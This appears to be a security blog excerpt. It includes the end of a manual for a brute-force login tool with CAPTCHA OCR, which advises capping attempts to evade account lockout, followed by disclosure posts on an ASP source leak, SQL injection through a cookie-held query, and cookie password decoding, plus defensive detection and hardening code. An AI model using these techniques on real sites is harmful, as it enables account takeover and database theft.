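<div style="margin-left: 3em; text-indent: -1em;">24.<span style="color: #990000; font-weight: bold;">Noise-line grayscale lower limit</span>, 25.<span style="color: #990000; font-weight: bold;">Noise-line grayscale upper limit</span>, 25'. <span style="color: #990000; font-weight: bold;">Level-reduction value</span>: these three values affect how well the program filters noise lines and noise dots out of the image. The lower the grayscale value, the darker the color, with 0 being pure black; the higher the value, the whiter, with 255 being pure white. The upper and lower limits mean that only pixels whose value lies between them are treated as text to be recognized; all other pixels are treated as noise and filtered out. The better the program filters noise, the higher the OCR accuracy. The image is first converted to 256-level grayscale for OCR processing, and the <span style="color: #0000cc; font-weight: bold;">level-reduction value</span> reduces those 256 levels further; for example, "8" merges every 8 levels into 1, so 256 levels become 32. If the color difference between the text and the background or noise is large, raise this value; if the difference is small, lower it. <span style="color: red;">There is no fixed baseline for these three values; every site has its own best values, and you must find them by trial</span>.</div>
<div style="margin-left: 3em; text-indent: -1em;">26.<span style="color: #990000; font-weight: bold;">Password attempt count</span>: the minimum is 1, and 9999 means every value in the password list is tried. This setting is designed to keep accounts from being locked: if 5 wrong passwords are known to lock an account, set the count to 3 so that the account is not locked. After a few days, once the user logs in correctly, the wrong-password counter returns to zero.</div>
<div style="margin-left: 3em; text-indent: -1em;">27.<span style="color: #990000; font-weight: bold;">Magnification</span>: enlarging the image can sometimes improve the OCR success rate. The value is a floating-point number between 1 and 2.</div>
<div style="margin-left: 3em; text-indent: -1em;">28.<span style="color: #990000; font-weight: bold;">Rotation angle</span>: the text in some images is slanted; a rotation angle (between -90 and 90) can bring it back to horizontal for OCR. Randomly tilted text, of course, cannot be handled this way.</div>
<div style="margin-left: 3em; text-indent: -1em;">29.<span style="color: #990000; font-weight: bold;">test</span> button: once the fields are set, use the "test" button for a trial run. It really runs only one attempt; its purpose is to check whether the fields are filled in properly and whether the OCR result is satisfactory. If it is not, try adjusting the <span style="color: #0000cc; font-weight: bold;">noise-line grayscale lower limit</span>, <span style="color: #0000cc; font-weight: bold;">noise-line grayscale upper limit</span>, <span style="color: #0000cc; font-weight: bold;">level-reduction value</span>, <span style="color: #0000cc; font-weight: bold;">remove 2nd noise</span>, <span style="color: #0000cc; font-weight: bold;">remove 3rd noise</span>, <span style="color: #0000cc; font-weight: bold;">magnification</span> and <span style="color: #0000cc; font-weight: bold;">rotation angle</span> parameters to find the best recognition.</div>
<div style="margin-left: 3em; text-indent: -1em;">30.<span style="color: #990000; font-weight: bold;">Start</span>: when this button is pressed, the program starts guessing and the button text changes to "<span style="color: blue; font-weight: bold;">Stop</span>". Press "Stop" at any time to abort the current run (<span style="color: #38761d;">the program has no "pause" function</span>).</div>
<div style="margin-left: 3em; text-indent: -1em;">31.<span style="color: #990000; font-weight: bold;">View help</span>: loads the program's help document (the page you are reading now).</div>
<div style="margin-left: 3em; text-indent: -1em;">32.<span style="color: #990000; font-weight: bold;">Load settings</span>, 33.<span style="color: #990000; font-weight: bold;">Save settings</span>: the program has many settings fields, and entering each of them on every run would drive anyone mad. So that settings can be reused, the values that currently work well can be saved to a settings file and retrieved next time with "32.<span style="color: blue;">Load settings</span>". You can also build a common template, modify it, and store it with "33.<span style="color: blue;">Save settings</span>".</div>
<div style="margin-left: 3em; text-indent: -1em;">34.(<span style="color: #990000; font-weight: bold;">Browser window</span>): the page view of each round is shown in this window.</div>
<div style="margin-left: 3em; text-indent: -1em;">35.(<span style="color: #990000; font-weight: bold;">Processed CAPTCHA images</span>), 36.(<span style="color: #990000; font-weight: bold;">Select CAPTCHA</span>): shows the OCR result at each stage as the program transforms the image; use these previews as a reference when adjusting the parameters. Among the seven processing passes, if one pass gives the most accurate OCR result, <span style="color: #c00000; font-weight: bold;">tick</span> it, and that pass's OCR result is submitted as the CAPTCHA code instead of the final result.<br />This processing panel is normally hidden; <span style="color: #c00000; font-weight: bold;">double-click the image of item 10</span> to show or hide it.</div>
<div style="margin-left: 3em; text-indent: -1em;">37.(<span style="color: #990000; font-weight: bold;">Cracked credentials</span>): any account/password pairs that were guessed are shown here. A run log is also written to the execution directory, named yyyymmddRun.log (<span style="color: #cc0000;">yyyymmdd</span> is the year, month and day).<br />
This list is hidden while cracking is running; to toggle it manually, double-click the text label of item 16 or 17 (the words <span style="color: #c00000; font-style: italic; font-weight: bold;">Account file</span> or <span style="color: #c00000; font-style: italic; font-weight: bold;">Password file</span>).</div>
<div style="margin-left: 3em; text-indent: -1em;">38.(<span style="color: #990000; font-weight: bold;">Custom JavaScript</span>): this JavaScript acts only on the login page. When the page has finished loading, the function __func__ is called, and the JavaScript written here is wrapped inside __func__. For that reason only plain statements are supported here; do not wrap them in function NAME() { } yourself. For example:</div>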
<div style="border: 1pt solid black; margin-left: 3em; margin-right: 2em; padding: 4pt;">/* test: do not wrap this in your own function NAME() { } */<br />
document.getElementById("Account").style.backgroundColor = "green";<br />
</div>
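<div style="margin-left: 3em; text-indent: -1em;">39.(<span style="color: #990000; font-weight: bold;">Credentials currently being tried</span>): so that the user can follow the progress, the account and password currently being tried are shown here.</div>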
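<div style="margin-left: 2em;">Seen from the defending side, the password-first and account-first orders of item 18 and the attempt cap of item 26 leave different traces in failed-login logs. The following is an added example, not part of CodeCrack or the original post: it classifies each source address over constructed log records, and the thresholds, record layout and addresses are assumptions.</div>

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed failed-login records (timestamp, source address, account); not real data.
SAMPLE_FAILURES = [
    # One password per round, walked across many accounts, 3 seconds apart.
    ("2024-01-10T09:00:00", "203.0.113.7", "admin"),
    ("2024-01-10T09:00:03", "203.0.113.7", "88991"),
    ("2024-01-10T09:00:06", "203.0.113.7", "93676"),
    ("2024-01-10T09:00:09", "203.0.113.7", "52137"),
    ("2024-01-10T09:00:12", "203.0.113.7", "user"),
    ("2024-01-10T09:00:15", "203.0.113.7", "guest"),
    # Many passwords against a single account.
    ("2024-01-10T09:05:00", "198.51.100.20", "admin"),
    ("2024-01-10T09:05:03", "198.51.100.20", "admin"),
    ("2024-01-10T09:05:06", "198.51.100.20", "admin"),
    ("2024-01-10T09:05:09", "198.51.100.20", "admin"),
    ("2024-01-10T09:05:12", "198.51.100.20", "admin"),
    ("2024-01-10T09:05:15", "198.51.100.20", "admin"),
    # A user mistyping a password twice.
    ("2024-01-10T09:10:00", "192.0.2.44", "user"),
    ("2024-01-10T09:10:20", "192.0.2.44", "user"),
]


def classify_sources(failures, window=timedelta(minutes=30),
                     min_failures=6, min_accounts=5, per_account_cap=3):
    """Label each source address by the guessing order its failed logins show.

    "password-first": many failures against one account inside the window;
                      a per-account lockout counter catches this.
    "account-first":  few failures per account spread over many accounts;
                      a per-account counter never trips, so the count has to
                      be kept per source address instead.
    "normal":         neither pattern reached the thresholds.
    """
    by_source = defaultdict(list)
    for stamp, source, account in failures:
        by_source[source].append((datetime.fromisoformat(stamp), account))

    verdicts = {}
    for source, events in by_source.items():
        events.sort()
        verdicts[source] = "normal"
        start = 0
        for end in range(len(events)):
            # Slide the window so it never spans more than `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            in_window = events[start:end + 1]
            if len(in_window) < min_failures:
                continue
            per_account = Counter(account for _, account in in_window)
            busiest = max(per_account.values())
            if len(per_account) >= min_accounts and busiest <= per_account_cap:
                verdicts[source] = "account-first"
                break
            if busiest >= min_failures:
                verdicts[source] = "password-first"
                break
    return verdicts


if __name__ == "__main__":
    for source, verdict in classify_sources(SAMPLE_FAILURES).items():
        print(source, verdict)
```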
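<div style="color: #990000; font-size: 14pt; font-weight: bold;">IV. Loading the Account and Password Dictionary Files</div>
<div style="margin-left: 2em;">Brute-force guessing requires account and password dictionary files. A dictionary file must hold one entry per line. The program does not currently support paired account/password combinations in a single file; accounts and passwords must be in separate files. Below is a sample account dictionary file.</div>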
<div style="border: 1pt solid black; margin-left: 2em; margin-right: 2em; padding: 4pt;">
admin<br />
88991<br />
93676<br />
peterwumoj7427<br />
52137</div>
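<div style="color: #990000; font-size: 14pt; font-weight: bold;">V. Saving and Loading Settings Files</div>
<div style="margin-left: 2em;">Guessing against a CAPTCHA is far harder than guessing against a plain account/password login, and the parameters must be tuned to get good results. Tuning is tiring, and nobody wants to enter everything again for each test, so the current settings can be saved (see "33.<span style="color: #c00000; font-weight: bold;">Save settings</span>") and loaded with "32.<span style="color: #c00000; font-weight: bold;">Load settings</span>" the next time the same site is tested.<br />The settings file is itself a text file and can also be edited by hand; for details see <a href="http://atic-tw.blogspot.tw/2017/04/codecrack_16.html" style="color: blue; text-decoration: underline;" target="_parent">the CodeCrack settings file</a>.</div>
<div style="color: #990000; font-size: 14pt; font-weight: bold;">VI. Sample Web Pages for Testing</div>
<div style="margin-left: 2em;">Arbitrarily guessing the credentials of other people's websites is illegal. To test this tool, the author built a small set of web pages (CodeCrackDemo) that you can host on IIS for testing. If everything runs correctly, you should find two account/password pairs: <span style="font-weight: bold;">admin</span>/<span style="color: blue; font-weight: bold;">12345678a</span> and <span style="font-weight: bold;">user</span>/<span style="color: blue; font-weight: bold;">myPass1234</span>.</div>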
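</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com2tag:blogger.com,1999:blog-1967825056283652287.post-88573523547280235992021-08-29T05:45:00.003+08:002021-08-29T05:45:43.443+08:00A Website Administrator's Blunder<div style="border: 4px solid rgb(255, 0, 0); font-size: 1.2em; line-height: 200%; padding: 8px; word-break: normal;">
<p>This is an elementary mistake found on the public website of a domestic senior high school, and it has been reported to <a href="https://zeroday.hitcon.org/vulnerability/ZD-2021-00558" rel="nofollow" target="_blank">ZeroDay</a>!<br /></p>Was it to save money, or to cut corners? The site runs two web services on the same server, one on <b>Apache+PHP</b> and the other on <b>IIS+ASP</b>. Plenty of sites do the same, and the architecture itself is not the problem; the problem lies in how the site is configured!
<p style="text-align: center;"><b>
<span style="color: #990000;">For reasons of professional ethics, the URL and details of this website are not disclosed</span></b>.
</p>The school's home page (PHP) embeds a separate news management system (ASP) through an iframe. Because two services cannot share the same port, the home page uses <b>PORT 80</b> and the news management system uses <b>PORT 8080</b>, which is a reasonable allocation. However, probably because the PHP site was built first and nobody expected it to share a server with ASP, ASP pages are treated there as ordinary text files.
<div>In normal use, nothing looks wrong when browsing the site: www.XXXX.edu.tw opens the home page, and the embedded news management system sits in the middle of it.<br /></div>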
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsdArqtb2tgIRWDFgGf3nrQrmxYFB3eDM2ujR8Poz2e2oNiUhxWi8Ykd4sfnS6WmPSKbEHSE8B-W1UkADwLHxPNfafradCkO7eQ_X9lI2-pPw4nxrYkJue4wA02fuSJFcoE8CUZz1ugHXO/s1442/homePage.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1051" data-original-width="1442" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsdArqtb2tgIRWDFgGf3nrQrmxYFB3eDM2ujR8Poz2e2oNiUhxWi8Ykd4sfnS6WmPSKbEHSE8B-W1UkADwLHxPNfafradCkO7eQ_X9lI2-pPw4nxrYkJue4wA02fuSJFcoE8CUZz1ugHXO/w400-h291/homePage.PNG" width="400" /></a></div>Clicking the "Login" button of the news management system pops up the login screen (see the figure above). Note the URL on the login screen: it goes through PORT 8080 (www.XXXX.edu.tw:8080/admin.asp). If you browse to the same URL with the 8080 removed, what appears, as if by magic, is <span style="color: #2b00fe;"><b>the source code of admin.asp</b></span>.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjndcXvc-HDNsWt11HEOynsUdqbYx7B8fF6nxPMbl5xZajSj8hP6Suhda-cgMAOjJxlqkb5MpdOP0DtaeHA5RcbKiu0IGcp-I9CqkbU3GBy7_RRQtIh6MABCA4QWACJudEkB_Z8ZUEiXTl5/s1070/sourceCode.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1046" data-original-width="1070" height="391" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjndcXvc-HDNsWt11HEOynsUdqbYx7B8fF6nxPMbl5xZajSj8hP6Suhda-cgMAOjJxlqkb5MpdOP0DtaeHA5RcbKiu0IGcp-I9CqkbU3GBy7_RRQtIh6MABCA4QWACJudEkB_Z8ZUEiXTl5/w400-h391/sourceCode.PNG" width="400" /></a></div>
<p>The leaked source code shows that the back end uses an <b>MS ACCESS</b> database and reveals its path. Given the correct path, the database file can be downloaded, which amounts to taking the entire database!</p> <div style="margin-top: 8px;">How should this mistake be fixed? The simplest way is not to place the ASP pages and the PHP pages under the same root directory. Move the ASP directory and reconfigure the virtual directory in IIS, and the PHP service can no longer reach the ASP resources.</div>
<div style="border: 2px solid green; margin-top: 8px;"><span style="color: red;"><b><span style="font-size: large;">If you manage a website, please check whether you have made the same blunder!</span></b></span><br /></div>
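<p>One way to run the check suggested above, as an added example that is not from the original post: it walks the document root served by the Apache+PHP side and lists files that would be returned verbatim. The extension list, the sample tree and every file name other than admin.asp are constructed assumptions.</p>

```python
import os
import tempfile

# Assumed for illustration: extensions the port-80 (Apache+PHP) service has no
# handler for, so the file bytes go to the client unchanged.
UNHANDLED_EXTS = {".asp", ".asa", ".mdb"}
ASP_MARKER = b"<%"  # classic ASP script delimiter


def audit_docroot(docroot):
    """Return {relative_path: reason} for files the server would hand out as-is."""
    findings = {}
    for folder, _dirs, files in os.walk(docroot):
        for name in files:
            path = os.path.join(folder, name)
            rel = os.path.relpath(path, docroot).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            if ext in UNHANDLED_EXTS:
                findings[rel] = "unhandled extension " + ext
                continue
            if ext == ".php":
                continue  # executed by the PHP handler, not returned as text
            # Include files often carry other extensions, so look at content too.
            with open(path, "rb") as handle:
                if ASP_MARKER in handle.read(65536):
                    findings[rel] = "ASP script block in a file served as text"
    return findings


def build_sample_docroot(root):
    """Constructed layout mirroring the post: PHP home page and ASP system in one root."""
    samples = {
        "index.php": b"<?php echo 'home'; ?>",
        "admin.asp": b'<% dbPath = Server.MapPath("data/news.mdb") %>',
        "inc/conn.txt": b'<% Set conn = Server.CreateObject("ADODB.Connection") %>',
        "data/news.mdb": b"\x00\x01\x00\x00Standard Jet DB",
        "css/site.css": b"body { margin: 0; }",
    }
    for rel, content in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as handle:
            handle.write(content)


def run_demo():
    """Build the constructed tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_docroot(root)
        return audit_docroot(root)


if __name__ == "__main__":
    for rel, reason in sorted(run_demo().items()):
        print(rel, "->", reason)
```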
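</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-89940012024783143172021-02-21T10:44:00.002+08:002021-02-21T10:44:52.393+08:00Cookies Cause Trouble Again! SQL Injection in a Cookie<div style="border: 4px solid rgb(255, 0, 0); font-size: 1.2em; line-height: 200%; padding: 8px; word-break: normal;">
<p> The previous post, <a href="http://atic-tw.blogspot.com/2021/02/blog-post.html" style="font-weight: bold;">Sharing a "Password Cracking" Experience</a>, described developers storing an encoded password in a <b>Cookie</b>. This post is about storing the database SQL statement in a <b>Cookie</b>: by tampering with the SQL statement in the <b>Cookie</b>, the database can be ordered to do something else.</p>
<p><b>A domestic</b> map lookup service records the complete SQL statement in the Cookie's <span style="color: #990000;"><b>QuerySQL</b></span> field after the user enters query data. When the user moves to the next page or another page of results, the <span style="color: #990000;"><b>QuerySQL</b></span> content is sent back to the server, and the server simply runs the query again with that SQL statement, which gives attackers the opportunity to inject SQL commands.</p>
<p style="background-color: #ccccff; border: 1px solid green; line-hight: 120%; padding: 8px;">The author tried testing this entry point with SQLMAP but never got a usable response. If any fellow practitioner knows how to use SQLMAP to attack a SQL statement directly, advice would be much appreciated!</p>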
<p style="text-align: center;"><b>
<span style="color: #990000;">For reasons of professional ethics, the URL and details of this service website are not disclosed</span></b>.
</p>
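<p>First, click the "<b>Show all</b>" button on the query page (<b>Figure 1</b>) to obtain the list of units. Inspecting the <b>Cookie</b> in the response headers of the list page shows the SQL statement of the query (<b>Figure 2</b>).</p>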
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody>
<tr>
<td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMLvtLJpRVu-HJGHSLR-dPFDgpanGhQ6rW3BZ81Rpn_XUeBKNeIoDB5TstG-8Qm6nYoRyk9DJR9xoCLb1M01ogZPC3N25S-wIJerr3H8XXCIspbnNO9lSRNKJY_Z5vqOnoz921qmYnj1fC/s820/ib01.PNG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="645" data-original-width="820" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMLvtLJpRVu-HJGHSLR-dPFDgpanGhQ6rW3BZ81Rpn_XUeBKNeIoDB5TstG-8Qm6nYoRyk9DJR9xoCLb1M01ogZPC3N25S-wIJerr3H8XXCIspbnNO9lSRNKJY_Z5vqOnoz921qmYnj1fC/w400-h315/ib01.PNG" width="400" />
</a>
</td>
</tr>
<tr>
<td class="tr-caption" style="text-align: center;">Figure 1: The map query page</td>
</tr>
</tbody>
</table></div>
<div style="margin-top:8px">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPd5n_BiyGeZytgnt6jPifT_4uvR4JFaNBaPCDuwKfIV60UPd4pKnHyh5rwBB-wNdStxub3tS45_wig0MZpr61mxnL5413lkk-YK7VfHOScomuwFHVy3pq_nYukfbMYGXgyKtCkXRIUxBm/s825/ib02.PNG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="608" data-original-width="825" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPd5n_BiyGeZytgnt6jPifT_4uvR4JFaNBaPCDuwKfIV60UPd4pKnHyh5rwBB-wNdStxub3tS45_wig0MZpr61mxnL5413lkk-YK7VfHOScomuwFHVy3pq_nYukfbMYGXgyKtCkXRIUxBm/w400-h295/ib02.PNG" width="400" /></a>
</td>
</tr>
<tr>
<td class="tr-caption" style="text-align: center;">Figure 2: After the query, the SQL statement is recorded in the cookie</td>
</tr>
</tbody>
</table></div>
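<p>To repeat the test, find the browse URL in the pagination list (<b>Figure 3</b>). After each change to <span style="color: #990000;"><b>QuerySQL</b></span>, browse that URL so that the database server executes the SQL statement specified by <span style="color: #990000;"><b>QuerySQL</b></span>.</p>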
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnNMG_Ky5we4mpzC0EY_ThVloXPwaaaX_cvptEVNtPdar2uivesIrhoC2c4_963Ioh5TeyRVs17g5JWRpZo_7F53YuZyO9BJSl8V36cHAE1C_7LLTYBqTb5vusqv85PybOyJ3xUmeID6c8/s824/ib03.PNG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="455" data-original-width="824" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnNMG_Ky5we4mpzC0EY_ThVloXPwaaaX_cvptEVNtPdar2uivesIrhoC2c4_963Ioh5TeyRVs17g5JWRpZo_7F53YuZyO9BJSl8V36cHAE1C_7LLTYBqTb5vusqv85PybOyJ3xUmeID6c8/w400-h221/ib03.PNG" width="400" /></a>
</td>
</tr>
<tr>
<td class="tr-caption" style="text-align: center;">Figure 3: Finding the URL that can be browsed directly</td>
</tr>
</tbody>
</table></div>
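<p>To test whether a modified <span style="color: #990000;"><b>QuerySQL</b></span> is handed to the back end for execution, remove the SQL condition (<b>Where</b> and everything after it, as in <b>Figure 4</b>) and browse again. The system really does return <span style="color: #990000;"><b>1839</b>
</span> pages (see <b>Figure 5</b>; <span style="color: #cc0000;">originally there was only 1 page</span>), which confirms that the Cookie's <span style="color: #990000;"><b>QuerySQL</b></span> has a SQL injection vulnerability.</p>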
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0UdQzd89kA2hqbXUl4-r9XqUj2fFheqqAqHOPyGSl5kpM2ekvnfSyZpEC4-2PmtWSK6wWF-UmMmb5X9uDhCASIodh1YLx40KuRxABaoeRR7OZZLObTjM7VZEfDAS8EW6kViEfeFrR0O-/s1283/ib04.PNG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="585" data-original-width="1283" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0UdQzd89kA2hqbXUl4-r9XqUj2fFheqqAqHOPyGSl5kpM2ekvnfSyZpEC4-2PmtWSK6wWF-UmMmb5X9uDhCASIodh1YLx40KuRxABaoeRR7OZZLObTjM7VZEfDAS8EW6kViEfeFrR0O-/w400-h183/ib04.PNG" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Figure 4: Modifying the QuerySQL statement in the Cookie</td></tr></tbody></table></div>
<div style="margin-top:8px">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGyI9N7GtvXwI6GbAOSsHrZD0MII15hmoUxOs5_es5Qh4CAN-nFGgYuQWrioT-CJaUVUcF55xQFB5VGH5VLIhHCfGCLlm-uT7ahZ0w-eoKgKDm79eNy88CY9Tn4I-7bkFROJuHKlQ3g4dB/s734/ib05.PNG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="585" data-original-width="1283" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGyI9N7GtvXwI6GbAOSsHrZD0MII15hmoUxOs5_es5Qh4CAN-nFGgYuQWrioT-CJaUVUcF55xQFB5VGH5VLIhHCfGCLlm-uT7ahZ0w-eoKgKDm79eNy88CY9Tn4I-7bkFROJuHKlQ3g4dB/s734/ib05.PNG" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Figure 5: The returned result confirms that QuerySQL has a SQL injection vulnerability</td></tr></tbody></table></div>
<hr />
<fieldset style="background-color: #ffddff;">
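<legend style="background-color: #ffddff; font-size: 1.1em; font-weight: bold;">One more earnest reminder</legend>
If data must be exchanged between sessions, record it in back-end session variables. Never use a Cookie or hidden fields on the page: against attackers, Cookies and hidden fields offer no protection at all!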
</fieldset>
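<p>The reminder above, as an added example that is not the map service's code. The back-end language is not given on the page, so Python with sqlite3 and a hypothetical units table are assumed: the first pair of functions keeps the SQL text in the QuerySQL cookie as the post describes, and the second pair keeps the search state in a server-side session and sends only an opaque id.</p>

```python
import secrets
import sqlite3

PAGE_SIZE = 2


def make_db():
    """Constructed sample data; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE units (id INTEGER PRIMARY KEY, name TEXT, city TEXT)")
    db.executemany("INSERT INTO units (name, city) VALUES (?, ?)", [
        ("North Office", "Taipei"), ("Harbor Office", "Keelung"),
        ("East Office", "Taipei"), ("South Office", "Tainan"),
        ("West Office", "Taipei"),
    ])
    return db


# --- Pattern described in the post: the SQL text travels in the cookie --------
def search_vulnerable(city):
    """First request: returns the cookie the server sets."""
    return {"QuerySQL": "SELECT name FROM units WHERE city = '%s' ORDER BY id" % city}


def page_vulnerable(db, cookies):
    """Follow-up request: runs whatever SQL text the client sends back."""
    return [row[0] for row in db.execute(cookies["QuerySQL"])]


# --- Hardened: the search state stays on the server ---------------------------
SESSIONS = {}  # session id -> search state; stands in for the framework's session store


def search_hardened(city):
    """First request: store the search term server-side, hand out an opaque id."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"city": city}
    return {"sid": sid}


def page_hardened(db, cookies, page):
    """Follow-up request: the SQL is fixed in code and only values are bound."""
    state = SESSIONS.get(cookies.get("sid"))
    if state is None:
        return []  # unknown or forged id: nothing to page through
    rows = db.execute(
        "SELECT name FROM units WHERE city = ? ORDER BY id LIMIT ? OFFSET ?",
        (state["city"], PAGE_SIZE, page * PAGE_SIZE),
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    cookie = search_vulnerable("Taipei")
    print("as issued:", page_vulnerable(db, cookie))
    # Same edit as in Figure 4: drop WHERE and everything after it.
    edited = {"QuerySQL": cookie["QuerySQL"].split(" WHERE")[0]}
    print("edited cookie:", page_vulnerable(db, edited))
    safe = search_hardened("Taipei")
    print("hardened, extra cookie ignored:",
          page_hardened(db, dict(safe, QuerySQL=edited["QuerySQL"]), 0))
```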
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-82282689410436742362021-02-21T08:43:00.000+08:002021-02-21T08:43:03.097+08:00Sharing a "Password Cracking" Experience<div style="border: 4px solid rgb(0, 0, 204); font-size: 1.2em; line-height: 200%; padding: 8px; word-break: normal;">
<fieldset style="background-color: #ffddff;">
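<legend style="background-color: #ffddff; font-size: 1.1em; font-weight: bold;">A reminder to developers</legend>
Many articles and books warn that "<span style="color: #274e13;">passwords should be processed with a hash or a 'vetted' strong encryption algorithm before they are stored</span>".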
</fieldset>
<p style="text-indent: 2em;"><b>A certain securities broker's</b> online order system encodes the password and records it in a <b>Cookie</b> after login or a password change. This post explains how the plaintext password can be recovered from the content of that <b>Cookie</b>. <b><span style="color: #990000;">For reasons of professional ethics, the URL and details of this order system are not disclosed</span></b>.</p>
<p style="text-indent: 2em;"><b>After each</b> password change, inspecting the response headers shows that the length of the LoginPWD field value is a multiple of 4 (<b>Figure 1</b>) and that its characters fit the BASE64 encoding, so the guess was that the password is BASE64-encoded and then recorded in the Cookie. Decoding the LoginPWD value, however, yields garbage (<b>Figure 2</b>) rather than the original plaintext password, which suggests that "the password goes through some other encoding before BASE64 is applied". Since BASE64 to Text yields garbage, the next step is to use BASE64 to Hex to examine the decoded content (<b>Figure 3</b>).</p>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0oF-pradjOdrHJ555L0FCGbh9wPsKeDlRqnq0476gzcac2t6-U9D19ihwj3PEzrV8Oiw3NvphDWhMf-yW8VQqk1ijbc6csqZRqMfzPnUKzcouC8VT96cfgw4C5aRo0xJb6T-SH0KSzkf7/s1509/stock_01.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="778" data-original-width="1509" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0oF-pradjOdrHJ555L0FCGbh9wPsKeDlRqnq0476gzcac2t6-U9D19ihwj3PEzrV8Oiw3NvphDWhMf-yW8VQqk1ijbc6csqZRqMfzPnUKzcouC8VT96cfgw4C5aRo0xJb6T-SH0KSzkf7/w400-h206/stock_01.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Figure 1: Inspecting the header information of the response<br /></td></tr></tbody></table><br /> <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC4yvB2zVLujvJSf1areVsoVQ4oQmsqaVBKPWcf23aKMxfWXzSlIOIw8sXym-5FDcKtqaZs2wzFI4V8sA0CdmSy4b6Th0MaVtSHOAidl6NXCyzLjFgLk4a6WPX-o09OITTbzgHqW4kMPp4/s597/stock_02.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="597" data-original-width="487" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC4yvB2zVLujvJSf1areVsoVQ4oQmsqaVBKPWcf23aKMxfWXzSlIOIw8sXym-5FDcKtqaZs2wzFI4V8sA0CdmSy4b6Th0MaVtSHOAidl6NXCyzLjFgLk4a6WPX-o09OITTbzgHqW4kMPp4/w326-h400/stock_02.png" width="326" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Figure 2: Direct decoding yields only garbage<br /></td></tr></tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW94IooJ__h0jgQ-iOgP1v2f_HT6OTu2WUqamwTngCmwrieLvPFPiRNLqFHKpuzRlrFyz88pWpeeUrkDalGFVWgE3-VSc-cmq8EC1SITG2J9hgs6L_MbbEoDLv6BSrDtuLHutNoYeMRxGU/s834/stock_03.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="834" data-original-width="536" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW94IooJ__h0jgQ-iOgP1v2f_HT6OTu2WUqamwTngCmwrieLvPFPiRNLqFHKpuzRlrFyz88pWpeeUrkDalGFVWgE3-VSc-cmq8EC1SITG2J9hgs6L_MbbEoDLv6BSrDtuLHutNoYeMRxGU/w258-h400/stock_03.png" width="258" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Figure 3: Viewing the decoded result with BASE64 to Hex<br /></td></tr></tbody></table>
<p style="text-indent: 2em;"></p>
